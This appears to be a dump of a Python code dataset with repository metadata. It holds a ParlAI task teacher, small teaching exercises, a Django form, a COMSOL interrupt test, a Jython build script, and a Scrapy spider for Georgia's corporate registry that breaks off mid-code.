# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.core.teachers import FbDialogTeacher
from parlai.core.agents import MultiTaskTeacher
from .build import build
import copy
import os
def _path(task, opt):
# Build the data if it doesn't exist.
build(opt)
suffix = ''
dt = opt['datatype'].split(':')[0]
if dt == 'train':
suffix = 'train'
elif dt == 'test':
suffix = 'test_2500ex'
elif dt == 'valid':
suffix = 'valid_2000ex'
return os.path.join(
opt['datapath'], 'CBT', 'CBTest', 'data', task + '_' + suffix + '.txt')
class NETeacher(FbDialogTeacher):
def __init__(self, opt, shared=None):
opt['datafile'] = _path('cbtest_NE', opt)
opt['cloze'] = True
super().__init__(opt, shared)
class CNTeacher(FbDialogTeacher):
def __init__(self, opt, shared=None):
opt['datafile'] = _path('cbtest_CN', opt)
opt['cloze'] = True
super().__init__(opt, shared)
class VTeacher(FbDialogTeacher):
def __init__(self, opt, shared=None):
opt['datafile'] = _path('cbtest_V', opt)
opt['cloze'] = True
super().__init__(opt, shared)
class PTeacher(FbDialogTeacher):
def __init__(self, opt, shared=None):
opt['datafile'] = _path('cbtest_P', opt)
opt['cloze'] = True
super().__init__(opt, shared)
# By default train on all tasks at once.
class DefaultTeacher(MultiTaskTeacher):
def __init__(self, opt, shared=None):
opt = copy.deepcopy(opt)
opt['task'] = 'cbt:NE,cbt:CN,cbt:V,cbt:P'
super().__init__(opt, shared)
| 1,038 | 64 | 267 |
4b95b9ac7e0519a13cf1fee5ad8da8e76d71d11a | 431 | py | Python | Generators.py | m10singh94/Python-programs | a83083044b4a85afcf70c4b7024287a808b01fee | [
"Apache-2.0"
] | null | null | null | Generators.py | m10singh94/Python-programs | a83083044b4a85afcf70c4b7024287a808b01fee | [
"Apache-2.0"
] | null | null | null | Generators.py | m10singh94/Python-programs | a83083044b4a85afcf70c4b7024287a808b01fee | [
"Apache-2.0"
] | null | null | null | import random
#1
for number in gensquares(10):
print(number)
print('\n')
#2
for number in rand_num(1,10,12):
print(number)
print('\n')
#3
s = 'hello'
s_iter = iter(s)
print(next(s_iter))
print(next(s_iter))
print(next(s_iter))
print(next(s_iter))
print(next(s_iter)) | 16.576923 | 38 | 0.645012 | import random
#1
def gensquares(n):
for x in range(n):
yield x**2
for number in gensquares(10):
print(number)
print('\n')
#2
def rand_num(low, high, n):
for i in range(0,n):
yield random.randint(low,high)
for number in rand_num(1,10,12):
print(number)
print('\n')
#3
s = 'hello'
s_iter = iter(s)
print(next(s_iter))
print(next(s_iter))
print(next(s_iter))
print(next(s_iter))
print(next(s_iter)) | 109 | 0 | 44 |
3b3455757da385a4f765daef6d697e12b221bf80 | 975 | py | Python | employee_portal/view_employee_information/forms.py | Dmitriy200123/employee_portal | e06c2cfc03a5d046d5846186249c2140e7ba7814 | [
"MIT"
] | null | null | null | employee_portal/view_employee_information/forms.py | Dmitriy200123/employee_portal | e06c2cfc03a5d046d5846186249c2140e7ba7814 | [
"MIT"
] | null | null | null | employee_portal/view_employee_information/forms.py | Dmitriy200123/employee_portal | e06c2cfc03a5d046d5846186249c2140e7ba7814 | [
"MIT"
] | 1 | 2021-07-28T14:48:40.000Z | 2021-07-28T14:48:40.000Z | from django import forms
from django.forms import ModelForm
from employee_information_site.models import CompanyDepartment, EmployeePosition, Employee
| 46.428571 | 108 | 0.641026 | from django import forms
from django.forms import ModelForm
from employee_information_site.models import CompanyDepartment, EmployeePosition, Employee
class FilterForm(ModelForm):
def __init__(self, *args, **kwargs):
super(FilterForm, self).__init__(*args, **kwargs)
self.fields['department'].empty_label = 'Выберите отдел'
self.fields['position'].empty_label = 'Выберите должность'
department = forms.ModelChoiceField(CompanyDepartment.objects, required=False,
widget=forms.Select(attrs={'class': 'search_parameter department'}))
position = forms.ModelChoiceField(EmployeePosition.objects, required=False,
widget=forms.Select(choices=EmployeePosition.objects.all(),
attrs={'class': 'search_parameter position'}))
class Meta:
model = Employee
fields = ['department', 'position']
| 235 | 595 | 23 |
f68c9af4edf24f6038b2dc6406e316c94a3d6b34 | 1,467 | py | Python | sandbox/test_abort.py | gwiederhecker/MPh | d5eb7b6e9e00fe3fcd00acf53278a89243ae512a | [
"MIT"
] | 1 | 2021-12-23T09:15:56.000Z | 2021-12-23T09:15:56.000Z | sandbox/test_abort.py | gwiederhecker/MPh | d5eb7b6e9e00fe3fcd00acf53278a89243ae512a | [
"MIT"
] | null | null | null | sandbox/test_abort.py | gwiederhecker/MPh | d5eb7b6e9e00fe3fcd00acf53278a89243ae512a | [
"MIT"
] | null | null | null | """
Tests if `KeyboardInterrupt` exception are properly handled.
This test currently fails. That is, trying to interrupt an ongoing
operation of the Comsol client crashes out of the Python session
instead of allowing further code execution or a return to the
interactive prompt.
The script does not depend on MPh, but starts the Comsol client
directly via the Java bridge JPype. Paths to the Comsol installation
are hard-coded for a Windows installation of Comsol 5.6. Other versions
or install locations can be tested by editing the assignment to the
`root` variable. On Linux, 'win64' has to be replaced by 'glnxa64',
and on macOS by 'maci64'.
"""
import jpype
import jpype.imports
from time import sleep
from timeit import default_timer as now
from pathlib import Path
print(f'Starting Comsol\'s Java VM via JPype {jpype.__version__}.')
root = Path(r'C:\Program Files\COMSOL\COMSOL56\Multiphysics')
jvm = root/'java'/'win64'/'jre'/'bin'/'server'/'jvm.dll'
jpype.startJVM(str(jvm), classpath=str(root/'plugins'/'*'), interrupt=False)
print('Starting stand-alone Comsol client.')
from com.comsol.model.util import ModelUtil as client
client.initStandalone(False)
client.loadPreferences()
print('Press Ctrl+C within the next 10 seconds.')
t0 = now()
try:
sleep(10)
except KeyboardInterrupt:
pass
finally:
if now() - t0 < 9.9:
print('Test passed.')
else:
print('Sleep timer expired.')
| 33.340909 | 77 | 0.728698 | """
Tests if `KeyboardInterrupt` exception are properly handled.
This test currently fails. That is, trying to interrupt an ongoing
operation of the Comsol client crashes out of the Python session
instead of allowing further code execution or a return to the
interactive prompt.
The script does not depend on MPh, but starts the Comsol client
directly via the Java bridge JPype. Paths to the Comsol installation
are hard-coded for a Windows installation of Comsol 5.6. Other versions
or install locations can be tested by editing the assignment to the
`root` variable. On Linux, 'win64' has to be replaced by 'glnxa64',
and on macOS by 'maci64'.
"""
import jpype
import jpype.imports
from time import sleep
from timeit import default_timer as now
from pathlib import Path
print(f'Starting Comsol\'s Java VM via JPype {jpype.__version__}.')
root = Path(r'C:\Program Files\COMSOL\COMSOL56\Multiphysics')
jvm = root/'java'/'win64'/'jre'/'bin'/'server'/'jvm.dll'
jpype.startJVM(str(jvm), classpath=str(root/'plugins'/'*'), interrupt=False)
print('Starting stand-alone Comsol client.')
from com.comsol.model.util import ModelUtil as client
client.initStandalone(False)
client.loadPreferences()
print('Press Ctrl+C within the next 10 seconds.')
t0 = now()
try:
sleep(10)
except KeyboardInterrupt:
pass
finally:
if now() - t0 < 9.9:
print('Test passed.')
else:
print('Sleep timer expired.')
| 0 | 0 | 0 |
daf513fbe709d0f310a608eb9a54407a037600eb | 1,112 | py | Python | modules/dazzle/src/main/jython/exec_test_setup.py | drichan/xito | 811f29e8ecda8072ce2a0eb4373ec16f6b083c99 | [
"Apache-2.0"
] | null | null | null | modules/dazzle/src/main/jython/exec_test_setup.py | drichan/xito | 811f29e8ecda8072ce2a0eb4373ec16f6b083c99 | [
"Apache-2.0"
] | null | null | null | modules/dazzle/src/main/jython/exec_test_setup.py | drichan/xito | 811f29e8ecda8072ce2a0eb4373ec16f6b083c99 | [
"Apache-2.0"
] | 1 | 2018-10-19T07:49:02.000Z | 2018-10-19T07:49:02.000Z | import shutil
import java.lang.System
print "Setup exec_test using exec_test_setup.py"
#System Properties
user_home = java.lang.System.getProperty("user.home")
base_dir = java.lang.System.getProperty("basedir")
project_version = java.lang.System.getProperty("project.version")
artifactId = java.lang.System.getProperty("artifactId")
print("use_home=" + user_home)
print("base_dir=" + base_dir)
print("project_version=" + project_version)
print("artifactId=" + artifactId)
shutil.rmtree(base_dir + "/target/exec_test", ignore_errors=True)
shutil.copytree(base_dir + "/resources/exec_test", base_dir + "/target/exec_test")
shutil.copytree(base_dir + "/resources/" + artifactId, base_dir + "/target/exec_test/" + artifactId)
boot_jar_src = user_home +"/.m2/repository/org/xito/bootstrap/" + project_version + "/bootstrap-" + project_version + ".jar"
print "boot jar=" + boot_jar_src
shutil.copyfile(boot_jar_src, base_dir + "/target/exec_test/boot.jar")
test_jar = artifactId + "-" + project_version + "-tests.jar"
shutil.copyfile(base_dir + "/target/" + test_jar, base_dir + "/target/exec_test/" + test_jar)
| 41.185185 | 124 | 0.756295 | import shutil
import java.lang.System
print "Setup exec_test using exec_test_setup.py"
#System Properties
user_home = java.lang.System.getProperty("user.home")
base_dir = java.lang.System.getProperty("basedir")
project_version = java.lang.System.getProperty("project.version")
artifactId = java.lang.System.getProperty("artifactId")
print("use_home=" + user_home)
print("base_dir=" + base_dir)
print("project_version=" + project_version)
print("artifactId=" + artifactId)
shutil.rmtree(base_dir + "/target/exec_test", ignore_errors=True)
shutil.copytree(base_dir + "/resources/exec_test", base_dir + "/target/exec_test")
shutil.copytree(base_dir + "/resources/" + artifactId, base_dir + "/target/exec_test/" + artifactId)
boot_jar_src = user_home +"/.m2/repository/org/xito/bootstrap/" + project_version + "/bootstrap-" + project_version + ".jar"
print "boot jar=" + boot_jar_src
shutil.copyfile(boot_jar_src, base_dir + "/target/exec_test/boot.jar")
test_jar = artifactId + "-" + project_version + "-tests.jar"
shutil.copyfile(base_dir + "/target/" + test_jar, base_dir + "/target/exec_test/" + test_jar)
| 0 | 0 | 0 |
18b99e8cb5a22dc82d72bb7f1aca63ac9a0ca873 | 183 | py | Python | sololearn/FlowingWords/FlowingWords.py | SneakyWizards/HackerRankSolutions | daf494e7775bb0de5afcfdcfd45aa73e6a950e0e | [
"RSA-MD"
] | 3 | 2020-01-08T18:33:11.000Z | 2022-02-08T00:38:26.000Z | sololearn/FlowingWords/FlowingWords.py | SneakyWizards/HackerRankSolutions | daf494e7775bb0de5afcfdcfd45aa73e6a950e0e | [
"RSA-MD"
] | null | null | null | sololearn/FlowingWords/FlowingWords.py | SneakyWizards/HackerRankSolutions | daf494e7775bb0de5afcfdcfd45aa73e6a950e0e | [
"RSA-MD"
] | 4 | 2020-08-08T22:02:23.000Z | 2022-02-07T17:40:15.000Z | #!/usr/bin/python
in_str = str(input()).lower().split()
for i in range(1, len(in_str)):
if in_str[i-1][-1] != in_str[i][0]:
print("false")
exit(0)
print("true") | 18.3 | 39 | 0.546448 | #!/usr/bin/python
in_str = str(input()).lower().split()
for i in range(1, len(in_str)):
if in_str[i-1][-1] != in_str[i][0]:
print("false")
exit(0)
print("true") | 0 | 0 | 0 |
c17f59bdcdb9876af0c29a577cc8884e6cd3bfe3 | 31,676 | py | Python | registry/spiders/CorporationSpider.py | openc/GeorgiaCorporationScraper | 2bccab5ef2f00507128bc3dc299d5c27c3b39b97 | [
"MIT"
] | 1 | 2017-07-30T21:50:22.000Z | 2017-07-30T21:50:22.000Z | registry/spiders/CorporationSpider.py | openc/GeorgiaCorporationScraper | 2bccab5ef2f00507128bc3dc299d5c27c3b39b97 | [
"MIT"
] | null | null | null | registry/spiders/CorporationSpider.py | openc/GeorgiaCorporationScraper | 2bccab5ef2f00507128bc3dc299d5c27c3b39b97 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import re
import math
import urlparse
from scrapy.spider import BaseSpider
from scrapy.http import Request, FormRequest
from scrapy.selector import HtmlXPathSelector
from scrapy import log
from bs4 import BeautifulSoup
from registry.items import Corporation, Person, CorporationDocument, StatementDocument, RegistryStatement, PersonCorpRelation, RegistryExtract
from registry import pdfparse
| 46.857988 | 157 | 0.555057 | # -*- coding: utf-8 -*-
import re
import math
import urlparse
from scrapy.spider import BaseSpider
from scrapy.http import Request, FormRequest
from scrapy.selector import HtmlXPathSelector
from scrapy import log
from bs4 import BeautifulSoup
from registry.items import Corporation, Person, CorporationDocument, StatementDocument, RegistryStatement, PersonCorpRelation, RegistryExtract
from registry import pdfparse
class CorporationSpider(BaseSpider):
name = "corps"
page_by_page = True # Scrape page-by-page -- pretty slow (~40 hours)
# Guess db ids, MUCH faster for individual IDs,
# But the IDs aren't contiguous enough for this
# to be useful; there are ~500K corporations
# but ~10M IDs. Currently overruns memory.
#allowed_domains = ["enreg.reestri.gov.ge"]
base_url = "https://enreg.reestri.gov.ge/main.php"
start_urls = [base_url]
#MAX_CONSEC_MISSES = 100
# Override so that we can set our cookie easily.
def start_requests(self):
#log.msg("in start_requests")
# Scraping the search dropdown menu is incomplete
# Scraping with all results is difficult (can't get it to work),
# slow (~5.5s per results page), and includes Individual Entrepreneurs,
# which aren't very interesting. So, I'm hardcoding a list of corp
# types which will be searched. TODO: Allow list to be determined
# at runtime.
# results can also be found in 1 and 16, but both appear
# to be just individuals, without any other helpful info.
corp_forms = [2,3,4,5,6,7,8,9,10,11,12,13,15,17,
22,23,24,25,26,27,28,29,99,100]
results = []
for form in corp_forms:
request = Request(self.base_url,
callback=self.setup_cookies,
dont_filter=True,
meta={'cookiejar': str(form),
'corp_class': str(form),})
results.append(request)
return results
# This site does some incredibly stupid things with cookies
# so we need to use a separate cookie jar for each type of
# corporation that we will scrape.
def setup_cookies(self, response):
form_data ={'c': 'search',
'm': 'find_legal_persons',
's_legal_person_idnumber':'',
's_legal_person_name':''}
form_data['s_legal_person_form'] = response.meta['cookiejar']
if 'renew' in response.meta:
request = FormRequest(self.base_url,
dont_filter=True,
formdata=form_data,
callback=self.parse_corpresults,
meta={'cookiejar': response.meta['cookiejar'],
'renew': response.meta['renew'],
'total': response.meta['total'],
'page': response.meta['page'],})
else:
request = FormRequest(self.base_url,
formdata=form_data,
callback=self.parse_corpresults,
meta={'cookiejar': response.meta['cookiejar']})
yield request
# Finds out how many pages of results there are and launches
# requests for them.
def parse_corpresults(self, response):
# The total number of records is listed at the bottom of the table
# Divide by 5 records per page to get the total number of pages
# we need to scrape.
RESULTS_PER_PAGE = 5
form_data ={'c': 'search',
'm': 'find_legal_persons',
}
# The site does some dumb things with session variables, sometimes
# they need to get renewed.
if 'renew' in response.meta:
form_data['p'] = response.meta['page']
request = FormRequest(self.base_url,
dont_filter=True,
formdata=form_data,
callback=self.parse_corptable,
meta={'cookiejar': response.meta['cookiejar'],
'total': response.meta['total'],
'page': response.meta['page'],
'type': response.meta['cookiejar'],
})
yield request
# Otherwise, this is our first time viewing this result type, and
# we start from the beginning.
soup = BeautifulSoup(response.body, "html5lib", from_encoding="utf-8")
cells = soup.find_all("td")
td = None
# The number of results is in a <td> that contains the text
# სულ.
# After that, there is a <strong> tag that has the actual number
# in it, and then some other stuff. So we search through all
# the td tags until we find the one with matching text,
# and then grab the number in its <strong> tag.
regx = re.compile(u"^\s+სულ\s+$")
for cell in cells:
if (regx.match(cell.contents[0])):
td = cell #Found the right cell!
break;
total_results = float(td.find("strong").string)
total_pages = int(math.ceil(total_results/RESULTS_PER_PAGE))
#log.msg("Total pages: {}".format(str(total_pages)))
log.msg("Total results: {}".format(str(total_results)))
# Scrapy generally tends to scrape last page first,
# so reverse the order we return the results so that
# earlier pages are scraped earlier and easier to manually
# debug in a browser.
#for pg in reversed(range(1,total_pages+1)):
start_page = 1
for pg in reversed(range(1,total_pages+1)):
form_data["p"]=str(pg)
request = FormRequest(self.base_url,
formdata=form_data,
dont_filter=True,
callback=self.parse_corptable,
meta={'cookiejar': response.meta['cookiejar'],
'page': pg,
'total': total_pages,
'type': response.meta['cookiejar'],
})
yield request
#form_data["p"]=str(start_page)
#request = FormRequest(self.base_url,
# dont_filter=True,
# formdata=form_data,
# callback=self.parse_corptable,
# meta={'cookiejar': response.meta['cookiejar'],
# 'page': start_page,
# 'total': total_pages,
# 'type': response.meta['cookiejar'],
# })
#yield request
# Parses the table on the search results page in order to
# get links to individual corporation detail pages.
def parse_corptable(self, response):
# The database IDs of each corporation are located
# in onclick() events on <a> tags surrounding info
# button images. So we get the info images, and then
# extract the db id from their parents.
#log.msg("Parsing corp results table")
log.msg("Parsing page {}/{} of type {}".format(response.meta['page'],response.meta['total'],response.meta['type']))
soup = BeautifulSoup(response.body, "html5lib", from_encoding="utf-8")
buttons = soup.find_all("img",src="https://enreg.reestri.gov.ge/images/info.png")
results = []
for b in buttons:
dbid = b.parent['onclick'].split(u"(")[-1].rstrip(u")")
#log.msg("Found dbid: {}".format(dbid))
corp_url = self.base_url+u"?c=app&m=show_legal_person&legal_code_id={}".format(dbid)
request = Request(url=corp_url,callback=self.parse_corpdetails)
request.meta['id_code_reestri_db'] = dbid
request.meta['cookiejar'] = response.meta['cookiejar']
results.append(request)
# We also need to click the "Next" button
#next_btn = soup.find_all("img",src="https://enreg.reestri.gov.ge/images/next.png")
#if len(next_btn) > 0: # Found it.
# page_num = next_btn[0].parent['onclick'].replace(u'legal_person_paginate',u'').strip(u"()")
# form_data ={'c': 'search',
# 'm': 'find_legal_persons',
# 'p': page_num,}
# request = FormRequest(self.base_url,
# dont_filter=True,
# formdata=form_data,
# callback=self.parse_corptable,
# meta={'cookiejar': response.meta['cookiejar'],
# 'page': int(page_num),
# 'total': response.meta['total'],
# 'type': response.meta['cookiejar'],
# })
# results.append(request)
# If there's no Next button
if response.meta['page'] < response.meta['total'] and len(results) == 0:
log.msg("No results found on page {}/{} of type {}, renewing cookies".format(response.meta['page'],response.meta['total'],response.meta['type']))
request = Request(self.base_url,
callback=self.setup_cookies,
dont_filter=True,
meta={'cookiejar': response.meta['cookiejar'],
'renew': True,
'page': response.meta['page'],
'total': response.meta['total'],
'type': response.meta['cookiejar'],
})
results.append(request)
return results
# Here we finally get to actually scrape something
def parse_corpdetails(self, response):
def get_table_row(soup, header):
res = soup.find("td",text=header)
if res is not None:
text = res.find_next_sibling("td").string
if text is not None:
text = text.strip()
return text
#log.msg("Parsing corp details page")
soup = BeautifulSoup(response.body, "html5lib", from_encoding="utf-8")
results = [] # Results to be returned by this callback
# Create 1 corporation
corp = Corporation()
corp['id_code_legal'] = get_table_row(soup,u"საიდენტიფიკაციო კოდი")
corp['personal_code'] = get_table_row(soup,u"პირადი ნომერი")
corp['state_reg_code'] = get_table_row(soup,u"სახელმწიფო რეგისტრაციის ნომერი")
corp['name'] = get_table_row(soup,u"დასახელება")
corp['classification'] = get_table_row(soup,u"სამართლებრივი ფორმა")
corp['registration_date'] = get_table_row(soup,u"სახელმწიფო რეგისტრაციის თარიღი")
corp['id_code_reestri_db'] = response.meta['id_code_reestri_db']
# The status cell has some cruft in it, so the easy method doesn't work
corp['status'] = soup.find("td", text=u"სტატუსი").find_next_sibling("td").div.string
if (corp['status'] is not None):
corp['status'] = corp['status'].strip()
corp['no_docs'] = True
#results.append(corp)
# Return 1 person if necessary (personal corp)
if ((corp['classification'] == u"ინდივიდუალური მეწარმე") and (corp['personal_code'] is not None)):
pers = Person()
pers['name'] = corp['name']
pers['personal_code'] = corp['personal_code']
results.append(pers)
# Return Requests / Items for statements and scanned documents.
stmnt_caption = soup.find("caption", text=u"განცხადებები")
scand_caption = soup.find("caption", text=u"სკანირებული დოკუმენტები")
# Return requests for statement pages
if stmnt_caption is not None:
corp['no_docs'] = False
stmnt_table = stmnt_caption.parent
for row in stmnt_table.tbody.find_all("tr"):
link = row.find_all("img", src="https://enreg.reestri.gov.ge/images/blob.png")[0].parent
stmnt_dbid = link['onclick'].split(u"(")[-1].rstrip(u")")
my_url = self.base_url+u"?c=app&m=show_app&app_id={}".format(stmnt_dbid)
results.append(Request(url=my_url,
callback=self.parse_statement,
meta={'cookiejar':response.meta['cookiejar'],
'corp_id_code':corp['id_code_legal'],
'stmnt_id_reestri_db':stmnt_dbid}))
if scand_caption is not None:
corp['no_docs'] = False
scand_table = scand_caption.parent
for row in scand_table.tbody.find_all("tr"):
link_node = row.find_all("img", src="https://enreg.reestri.gov.ge/images/blob.png")[0].parent
doc_url = link_node['href']
# Get the file name
# It's the text of the second column.
# But there's an empty <strong> tag there so we
# can't use BeautifulSoup's convenience .string attribute
#log.msg("Link node next element {}".format(link_node.parent.next_element))
fname = link_node.parent.find_next_sibling("td").find("a").string
# Create a CorporationDocument
doc = CorporationDocument(fk_corp_id_code=corp['id_code_legal'],filename=fname,link=doc_url)
results.append(doc)
# Create a request if we might be able to parse it (pdf only)
if fname[-3:] == "pdf":
results.append(Request(url=doc_url,
callback=self.parse_corp_pdf,
meta={'cookiejar':response.meta['cookiejar']}))
results.append(corp)
return results
# Parse a corporation statement page.
# This has lots of details about the corporation and links to
# other stuff.
def parse_statement(self, response):
from scrapy.shell import inspect_response
results = []
app_id_code_reestri_db = urlparse.parse_qs(urlparse.urlparse(response.request.url)[4])['app_id'][0]
soup = BeautifulSoup(response.body, "html5lib", from_encoding="utf-8")
# First table: "Prepared documents" -- scrape details into CorpDoc item
# and then grab the doc too; they are usually PDFs.
prepared_table = soup.find("caption", text=u"მომზადებული დოკუმენტები")
if prepared_table is not None:
prepared_table = prepared_table.parent
for row in prepared_table.find_all("tr"):
# First cell contains link
# Second contains title, date
# Third is blank
cells = row.find_all("td")
link = cells[0].a["href"]
spans = cells[1].find_all("span")
title = spans[0].string
date = spans[1].string
results.append(StatementDocument(
fk_corp_id_code=response.meta['corp_id_code'],
fk_stmnt_id_code_reestri_db=app_id_code_reestri_db,
link=link,
title=title,
date=date))
results.append(Request(url=link,
callback=self.parse_stmnt_prepared_doc,
meta={'cookiejar':response.meta['cookiejar'],
'corp_id_code':response.meta['corp_id_code']}))
# Second table: Status Documents. Scrape details into CorpDocs, and
# grab the docs too, they are usually PDFs.
status_table = soup.find("caption", text=u"სტატუსი / გადაწყვეტილება")
if status_table is not None:
status_table = status_table.parent
for row in status_table.find_all("tr"):
cells = row.find_all("td")
link = cells[0].a["href"]
registration_num = cells[1].find(class_="maintxt").string
date = cells[1].find(class_="smalltxt").string
title = cells[2].find(style=True).string
results.append(StatementDocument(
fk_corp_id_code=response.meta['corp_id_code'],
fk_stmnt_id_code_reestri_db=app_id_code_reestri_db,
link=link,
title=title,
date=date,
registration_num=registration_num))
# Probably don't actually need to parse these.
#results.append(Request(url=link,
# callback=self.parse_stmnt_status_pdf,
# meta={'cookiejar':response.meta['cookiejar'],
# 'id_code_reestri_db':response.meta['id_code_reestri_db']}))
# Third table: Scanned Documents. Scrape details into CorpDocs, and
# grab the docs if they are PDFs.
scanned_table = soup.find("caption", text=u"სკანირებული დოკუმენტები")
if scanned_table is not None:
scanned_table = scanned_table.parent
for row in scanned_table.find_all("tr"):
cells = row.find_all("td")
link = cells[0].a["href"]
doc_info = cells[1].find_all(class_="maintxt")
if (len(doc_info) == 2):
title = doc_info[0].string
date = doc_info[1].string
else:
date = doc_info[0].string
title = None
filename = cells[2].find("a").find("span").string
doc = StatementDocument(
fk_corp_id_code=response.meta['corp_id_code'],
fk_stmnt_id_code_reestri_db=app_id_code_reestri_db,
link=link,
date=date,
filename=filename)
if (title):
doc['title'] = title
results.append(doc)
#TODO: Check whether it's a PDF and if so, return
# a Request to the document.
# Fourth table: Statement details. Scrape details into RegistryStatement.
statement = RegistryStatement()
# First block of info, starting with statement number.
regx = re.compile(u"^\s+განცხადება.+$")
caption = soup.find("caption",text=regx)
if caption is None:
inspect_response(response)
statement['statement_num'] = caption.string.split('#')[1]
table = caption.parent
statement['registration_num'] = self._get_header_sib(table,u"\n\s*რეგისტრაციის ნომერი\s*").span.string
statement['statement_type'] = self._get_header_sib(table,u"\n\s*მომსახურების სახე\s*").span.string
statement['service_cost'] = self._get_header_sib(table,u"\n\s*მომსახურების ღირებულება\s*").span.string
pay_debt = self._get_header_sib(table,u"\n\s*გადასახდელი თანხა/ბალანსი\s*").span.string
statement['payment'] = pay_debt.split("/")[0]
statement['outstanding'] = pay_debt.split("/")[1]
statement['id_reestri_db'] = response.meta['stmnt_id_reestri_db']
# Second block of info, starting after payment details.
# Find the correct table
table = soup.find("div", id="application_tab").table
# Grab the relevant parts
statement['id_code_legal'] = self._get_header_sib(table,u"საიდენტიფიკაციო ნომერი").strong.string
statement['name'] = self._get_header_sib(table,u"სუბიექტის დასახელება ").string
statement['classification'] = self._get_header_sib(table,u"სამართლებრივი ფორმა").string
statement['reorganization_type'] = self._get_header_sib(table,u"რეორგანიზაციის ტიპი ").string
statement['quantity'] = self._get_header_sib(table,u"რაოდენობა").string
statement['changed_info'] = self._get_header_sib(table,u"შესაცვლელი რეკვიზიტი: ").string
# Attached docs description is a <ul>
attached = self._get_header_sib(table, u"\n\s*თანდართული დოკუმენტაცია\s")
attached_desc = []
for li in attached.ul.contents:
attached_desc.append(li.string)
statement['attached_docs_desc'] = attached_desc
# Additional docs is a <div>, don't know what the format looks like yet
addtl_td = self._get_header_sib(table,u"\n\s*დამატებით წარმოდგენილი\s*")
statement['additional_docs'] = addtl_td.find(id="additional_docs_container").string
# Issued docs also a ul
issued = self._get_header_sib(table, u"\n\s*გასაცემი დოკუმენტები\s*").ul
issued_desc = []
for li in issued.contents:
issued_desc.append(li.string)
statement['issued_docs'] = issued_desc
# Don't know the format of notes yet either.
notes_td = self._get_header_sib(table, u"\n\s*შენიშვნა\s*")
statement['notes'] = notes_td.string
results.append(statement)
# Cells containing people require a bit more intelligence
representative_td = self._get_header_sib(table,u" წარმომადგენელი ")
rv_pers = self._person_from_statement_cell(representative_td)
if len(rv_pers) > 0:
results.append(PersonCorpRelation(person=rv_pers,
fk_corp_id_code = response.meta['corp_id_code'],
relation_type = [u"წარმომადგენელი"],
cite_type = "statement",
cite_link = response.request.url))
representee_td = self._get_header_sib(table,u" წარმომდგენი ")
re_pers = self._person_from_statement_cell(representee_td)
if len(re_pers) > 0:
results.append(PersonCorpRelation(person=re_pers,
fk_corp_id_code = response.meta['corp_id_code'],
relation_type = [u"წარმომდგენი"],
cite_type = "statement",
cite_link = response.request.url))
ganmcxadebeli_td = self._get_header_sib(table,u"განმცხადებელი ")
g_pers = self._person_from_statement_cell(ganmcxadebeli_td)
if len(g_pers) > 0:
results.append(PersonCorpRelation(person=g_pers,
fk_corp_id_code = response.meta['corp_id_code'],
relation_type = [u"განმცხადებელი"],
cite_type = "statement",
cite_link = response.request.url))
return results
def parse_corp_pdf(self, response):
pass
# Each statement may have an output document which is "prepared"
# for that statement. This function scrapes those documents
def parse_stmnt_prepared_doc(self, response):
return self._info_from_pdf(response.body,response.url, response.meta['corp_id_code'])
def _info_from_pdf(self,text,url,corp_id_code):
from scrapy.shell import inspect_response
# These documents are PDFs, so they're going to be coming
# from the PdfToHtml Middleware, which means they'll
# be XML rather than HTML.
log.msg("Parsing PDF {}".format(url), level=log.DEBUG)
headers = pdfparse.headers
results = []
soup = BeautifulSoup(text, "xml", from_encoding="utf-8")
boxes = pdfparse.boxes_from_xml(text)
boxes = pdfparse.check_box_values(boxes)
# The following condition is to check whether we're dealing with an English or a Georgian docuument.
englishHeader = soup.find("text",text="Entity")
isEnglishDocument = False
if englishHeader:
isEnglishDocument = True
georgianEntityTitle = u"სუბიექტი"
isGeorgianDocToParse = soup.find("text",text=georgianEntityTitle)
if (isGeorgianDocToParse or isEnglishDocument):
#boxes = pdfparse.remove_duplicates(boxes) # Handily, this sorts too
# TextBoxes define sort order as top-to-bottom, left-to-right.
# TODO: Check for malformed / Blank / Something else extracts
extract = RegistryExtract()
extract['fk_corp_id_code'] = corp_id_code
extract['corp_url'] = url
# Get extract date.
date_lines = pdfparse.get_pdf_lines('extract_date',boxes,soup,isEnglishDocument,False)
if date_lines is not None:
extract['date'] = u"".join([tb for tb in date_lines])
# Get mailing address
address_lines = pdfparse.get_pdf_lines('address',boxes,soup,isEnglishDocument,False)
if address_lines is not None:
s = u"".join([tb for tb in address_lines])
log.msg("Found address, printing: ", level=log.DEBUG)
# TODO: Metrics to check whether we've mis-parsed.
extract['corp_address'] = s
log.msg(unicode(s),level=log.DEBUG)
else:
address_lines = pdfparse.get_pdf_lines('address',boxes,soup,isEnglishDocument,True)
if address_lines is not None:
s = u"".join([tb for tb in address_lines])
log.msg("Found address on 2nd try, printing: ", level=log.DEBUG)
# TODO: Metrics to check whether we've mis-parsed.
extract['corp_address'] = s
log.msg(unicode(s),level=log.DEBUG)
else:
log.msg("No address found.", level=log.DEBUG)
# Get legal form
legalform_lines = pdfparse.get_pdf_lines('legal_form',boxes,soup,isEnglishDocument,False)
if legalform_lines is not None:
log.msg("Found legal form, printing: ", level=log.DEBUG)
s = u"".join([tb for tb in legalform_lines])
# TODO: Metrics to check whether we've mis-parsed.
extract['corp_legalform'] = s
log.msg(unicode(s),level=log.DEBUG)
else:
legalform_lines = pdfparse.get_pdf_lines('legal_form',boxes,soup,isEnglishDocument,True)
if legalform_lines is not None:
log.msg("Found legal form on 2nd try, printing: ", level=log.DEBUG)
s = u"".join([tb for tb in legalform_lines])
# TODO: Metrics to check whether we've mis-parsed.
extract['corp_legalform'] = s
log.msg(unicode(s),level=log.DEBUG)
else:
log.msg("No legal form found.", level=log.DEBUG)
# Get email address
email_lines = pdfparse.get_pdf_lines('email',boxes,soup,isEnglishDocument,False)
if email_lines is not None:
log.msg("Found email, printing: ", level=log.DEBUG)
s = u"".join([tb for tb in email_lines])
log.msg(unicode(s), level=log.DEBUG)
# TODO: Validate email address to check for mis-parse
extract['corp_email'] = s
else:
log.msg("No email found.", level=log.DEBUG)
results.append(extract)
# Parse directors
dir_lines = pdfparse.get_pdf_lines('directors',boxes,soup,isEnglishDocument,False)
if(dir_lines is not None):
log.msg("Found directors block, printing", level=log.DEBUG)
text = [tb for tb in dir_lines]
board = pdfparse.parse_directors(text)
for mem in board:
try:
pers = Person(personal_code=mem["id_code"])
except (KeyError, IndexError):
continue
try:
pers["name"] = mem["name"]
except KeyError:
pass
try:
pers["nationality"] = mem["nationality"]
except KeyError:
pass
relation = PersonCorpRelation(person=pers,
